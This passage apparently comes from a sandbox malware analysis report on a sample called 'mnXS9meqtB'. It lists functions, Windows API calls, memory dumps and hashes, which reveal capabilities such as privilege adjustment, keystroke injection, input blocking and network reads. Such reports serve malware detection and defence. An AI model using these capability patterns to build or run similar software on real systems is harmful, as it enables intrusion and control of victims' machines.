                                                                            • Instruction Fuzzy Hash: 92A17B70114004BAD73F6B2A5C88EFFA95CEB4F354F128919F405DA992CB38DC96E272
                                                                            Function 00354EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003543BF,00000000), ref: 00354FA6
                                                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00354FD2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                                            • String ID:
                                                                            • API String ID: 599397726-0
                                                                            • Opcode ID: e138524a5bc841f3f809ef04e6836560386abc202d6987465ce5710d0d677d51
                                                                            • Instruction ID: 4e8adbc1b63b87e5e246a35ce77e480892b35c0f764c4646cc8565ffb87b72ec
                                                                            • Opcode Fuzzy Hash: e138524a5bc841f3f809ef04e6836560386abc202d6987465ce5710d0d677d51
                                                                            • Instruction Fuzzy Hash: 88410A71504305BFEB26DE84DC81EBF77BCEB4031AF10406AFA05671A0DB71AE8997A0
                                                                            Function 003077B0 Relevance: 4.6, APIs: 1, Strings: 1, Instructions: 1076COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: \Q;
                                                                            • API String ID: 4104443479-2286717943
                                                                            • Opcode ID: 91add4c65a1eaa0793eae223cef25e6aba128fe18b88c09cb46b96003272ce10
                                                                            • Instruction ID: 7b06741ff809c8e2d0d8563f4bb0044f6b3b9dda8cbd0d4d277d2c5fc9648953
                                                                            • Opcode Fuzzy Hash: 91add4c65a1eaa0793eae223cef25e6aba128fe18b88c09cb46b96003272ce10
                                                                            • Instruction Fuzzy Hash: 7EA26C74E05219CFDB26CF58C4907ADB7B5FF48310F2681A9E859AB391D734AE81CB90
                                                                            Function 0034E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0034E20D
                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0034E267
                                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0034E2B4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$DiskFreeSpace
                                                                            • String ID:
                                                                            • API String ID: 1682464887-0
                                                                            • Opcode ID: 7393eabff887833a1d63f0680d7e13d9ebab2edcc2d9993e2773aa5fb3b51447
                                                                            • Instruction ID: 29511a805e2b04090ea020ad7f56334e64a824b9b646a51fef50136295ddce8e
                                                                            • Opcode Fuzzy Hash: 7393eabff887833a1d63f0680d7e13d9ebab2edcc2d9993e2773aa5fb3b51447
                                                                            • Instruction Fuzzy Hash: CE216035A10218EFCB01EFA5D885EEDBBF8FF48310F0484A9E945AB291DB31A915CB50
                                                                            Function 0033B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0031F4EA: std::exception::exception.LIBCMT ref: 0031F51E
                                                                              • Part of subcall function 0031F4EA: __CxxThrowException@8.LIBCMT ref: 0031F533
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0033B180
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0033B1AD
                                                                            • GetLastError.KERNEL32 ref: 0033B1BA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                            • String ID:
                                                                            • API String ID: 1922334811-0
                                                                            • Opcode ID: a2bca03e211aad67b3523d55609a0d0856a15b04be9d854ae09529ec64e627bf
                                                                            • Instruction ID: 605d8ccd852880087b46ad55db123e17e651c0a68ea5795834ad5e58be0ea1f0
                                                                            • Opcode Fuzzy Hash: a2bca03e211aad67b3523d55609a0d0856a15b04be9d854ae09529ec64e627bf
                                                                            • Instruction Fuzzy Hash: 5D11BCB2800304AFE719AF64DCC6D6BB7ADFB44310B20852EF05697241DBB0FC418B60
                                                                            Function 00346606 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00346623
                                                                            • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00346664
                                                                            • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0034666F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                                            • String ID:
                                                                            • API String ID: 33631002-0
                                                                            • Opcode ID: ff35a759f82d03395b6afc615331e060be2a7c6cab8575ee80d9f8f02ef93181
                                                                            • Instruction ID: b5b8ee10599497babb260ffff6b0d78d928bb2e95f858598ce9ee43bd2c6046f
                                                                            • Opcode Fuzzy Hash: ff35a759f82d03395b6afc615331e060be2a7c6cab8575ee80d9f8f02ef93181
                                                                            • Instruction Fuzzy Hash: B7115E71E01228BFDB119FA8DC45BAEBBFCEB45B10F104152F900E6290D3B05E018BA1
                                                                            Function 003471FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00347223
                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0034723A
                                                                            • FreeSid.ADVAPI32(?), ref: 0034724A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                            • String ID:
                                                                            • API String ID: 3429775523-0
                                                                            • Opcode ID: a43167e64677a6ce9306ea48f7ed3230c807b67d315bbb0b01bb85057c93b534
                                                                            • Instruction ID: 93fd857691eb9ad57ffb94ffa211643827cd6a05d59ed0a8d65b7a2ab949c4d9
                                                                            • Opcode Fuzzy Hash: a43167e64677a6ce9306ea48f7ed3230c807b67d315bbb0b01bb85057c93b534
                                                                            • Instruction Fuzzy Hash: 20F01275904309BFDF05DFE4DD89AEEBBBCEF08301F5044A9A502E21D1E37056449B10
                                                                            Function 0034F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0034F599
                                                                            • FindClose.KERNEL32(00000000), ref: 0034F5C9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID:
                                                                            • API String ID: 2295610775-0
                                                                            • Opcode ID: 8eb44cc5e2f708f1492947ad6a9c5fb829ed223252000c0c5c424bf63b0a1d7c
                                                                            • Instruction ID: 058376334a8e1587beb545e2fce761b37f63517b7372314ad52e96dc12bac5e0
                                                                            • Opcode Fuzzy Hash: 8eb44cc5e2f708f1492947ad6a9c5fb829ed223252000c0c5c424bf63b0a1d7c
                                                                            • Instruction Fuzzy Hash: 3111C4316002009FD701EF28D849A6EB3E9FF89324F04895EF9A5DB291DB30BD048B85
                                                                            Function 0034CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0035BE6A,?,?,00000000,?), ref: 0034CEA7
                                                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0035BE6A,?,?,00000000,?), ref: 0034CEB9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFormatLastMessage
                                                                            • String ID:
                                                                            • API String ID: 3479602957-0
                                                                            • Opcode ID: 7606c10541110bcc24e1247614ea1adad0d18af33998d6d04c9b4eb4aaf86cb1
                                                                            • Instruction ID: 1b106a8eac42a9606d9e5f0fa8a351d4d2cbbb51a80dd87ef22e843c85f7f39b
                                                                            • Opcode Fuzzy Hash: 7606c10541110bcc24e1247614ea1adad0d18af33998d6d04c9b4eb4aaf86cb1
                                                                            • Instruction Fuzzy Hash: F0F08235111329ABDB11DBA4DC49FEA776DBF08361F004165F915DA181D770AA40CBA0
                                                                            Function 0034411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00344153
                                                                            • keybd_event.USER32(?,76AAC0D0,?,00000000), ref: 00344166
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: InputSendkeybd_event
                                                                            • String ID:
                                                                            • API String ID: 3536248340-0
                                                                            • Opcode ID: 355f0e785bd18c4536127bdd16577bb0460ee2e7838b21a59f574bbdc6217f44
                                                                            • Instruction ID: b3ace120cab926bec5f670c0251d56a5d69df1a4f0dcd0574478a046db3d9fcd
                                                                            • Opcode Fuzzy Hash: 355f0e785bd18c4536127bdd16577bb0460ee2e7838b21a59f574bbdc6217f44
                                                                            • Instruction Fuzzy Hash: 86F0907080034DAFDB068FA0C805BBE7FB4EF00305F00805AF9659A191D779D612DFA0
                                                                            Function 0033AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0033ACC0), ref: 0033AB99
                                                                            • CloseHandle.KERNEL32(?,?,0033ACC0), ref: 0033ABAB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                                            • String ID:
                                                                            • API String ID: 81990902-0
                                                                            • Opcode ID: 4c1f7b41ee3b0c1542bd81f0f468fc37fa8cfc86931b1562638fb81dfe242e42
                                                                            • Instruction ID: 7a183b22991dbabcffd05e0ea190dde0d6e4410c9f15e4aaa9e3d629be1be155
                                                                            • Opcode Fuzzy Hash: 4c1f7b41ee3b0c1542bd81f0f468fc37fa8cfc86931b1562638fb81dfe242e42
                                                                            • Instruction Fuzzy Hash: A8E0BF75000610AFE7262F54EC05DB6BBAEEB04320B108469B49985470D7625C90AB50
                                                                            Function 003281AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00326DB3,-0000031A,?,?,00000001), ref: 003281B1
                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 003281BA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: 3639a616b50e6d40fbdbc037220a5508a7a759b8214e3e50afa2bc70701cdea3
                                                                            • Instruction ID: b74db7a550b1eb68768256107e0e0d8f7b0bdb0d2d2c2a45c0c70a83bc3c7dc7
                                                                            • Opcode Fuzzy Hash: 3639a616b50e6d40fbdbc037220a5508a7a759b8214e3e50afa2bc70701cdea3
                                                                            • Instruction Fuzzy Hash: 7DB09235044708ABDB022BA1EC09B587F6CEB08752F0040A0F60D440A18BB254108B92
                                                                            Function 00313200 Relevance: 2.2, Strings: 1, Instructions: 986COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: <
                                                                            • API String ID: 3964851224-1591397561
                                                                            • Opcode ID: 9e2aef23c507b4dcf566ed210d12d401aff625bd742a7d81e9db97ecba7a2fdc
                                                                            • Instruction ID: 60a5b339f4e1da93506ccce3d301f78e99ed710880dfc30f1755f6844869656b
                                                                            • Opcode Fuzzy Hash: 9e2aef23c507b4dcf566ed210d12d401aff625bd742a7d81e9db97ecba7a2fdc
                                                                            • Instruction Fuzzy Hash: 8F929E70608341CFD72ADF18C480BAAB7E5BF88304F15895DE98A8B392D775ED85CB52
                                                                            Function 0032D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 206efba3301a378a89d64af8ae7a455fc46fd2abb6a4c393df1b3eda61c02f94
                                                                            • Instruction ID: 83d46967af96147bbcbefe42984717482f85d435a276dde315d70ba25eb20201
                                                                            • Opcode Fuzzy Hash: 206efba3301a378a89d64af8ae7a455fc46fd2abb6a4c393df1b3eda61c02f94
                                                                            • Instruction Fuzzy Hash: 6C32E232D29F514DD7239634D862336A29CAFB73D4F15D727F81AB5AAAEB29C4C34100
                                                                            Function 003096C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 674341424-0
                                                                            • Opcode ID: b3076afdcfe28b7686ac664d6b8578d7ed358b02892a55355d3909080e5fb829
                                                                            • Instruction ID: 5ece66e204bd885b4ca7e1b1aabc6a660b48aeb6915e290b9418adb06352e6d2
                                                                            • Opcode Fuzzy Hash: b3076afdcfe28b7686ac664d6b8578d7ed358b02892a55355d3909080e5fb829
                                                                            • Instruction Fuzzy Hash: 9D22C4716193009FD726DF14C8A1B6FB7E4BF88310F11891EF49A9B292DB75E944CB82
                                                                            Function 0033038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 16d3a8f2e99e31cf3368ff7c54e26541779844d800f6eafb878374e7bc2b7473
                                                                            • Instruction ID: 918ff3f3ac37a7a17910cecc74f5a22fc6db96ca58b4173e734f87ba45419757
                                                                            • Opcode Fuzzy Hash: 16d3a8f2e99e31cf3368ff7c54e26541779844d800f6eafb878374e7bc2b7473
                                                                            • Instruction Fuzzy Hash: 73B1D120D2AF414DD62396398871336B65CAFBB3D5F91D71BFC1A74E62EB2285D34280
                                                                            Function 0034B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __time64.LIBCMT ref: 0034B6DF
                                                                              • Part of subcall function 0032344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0034BDC3,00000000,?,?,?,?,0034BF70,00000000,?), ref: 00323453
                                                                              • Part of subcall function 0032344A: __aulldiv.LIBCMT ref: 00323473
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                                            • String ID:
                                                                            • API String ID: 2893107130-0
                                                                            • Opcode ID: b17bb5a779cf4569b8b92cd3d877839215d28e46919ee79e4df9f9b9c6ec24ce
                                                                            • Instruction ID: 3a1ded1639c2f0992b41d49ab26e821f23c8ddc0ee48d1799feeb9e5ebd2c2a6
                                                                            • Opcode Fuzzy Hash: b17bb5a779cf4569b8b92cd3d877839215d28e46919ee79e4df9f9b9c6ec24ce
                                                                            • Instruction Fuzzy Hash: 71217F766345108BC72ACF38C881A92F7E5EB95310B258E6DE4E5CF2C0CB78BA05DB54
                                                                            Function 00356AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • BlockInput.USER32(00000001), ref: 00356ACA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: BlockInput
                                                                            • String ID:
                                                                            • API String ID: 3456056419-0
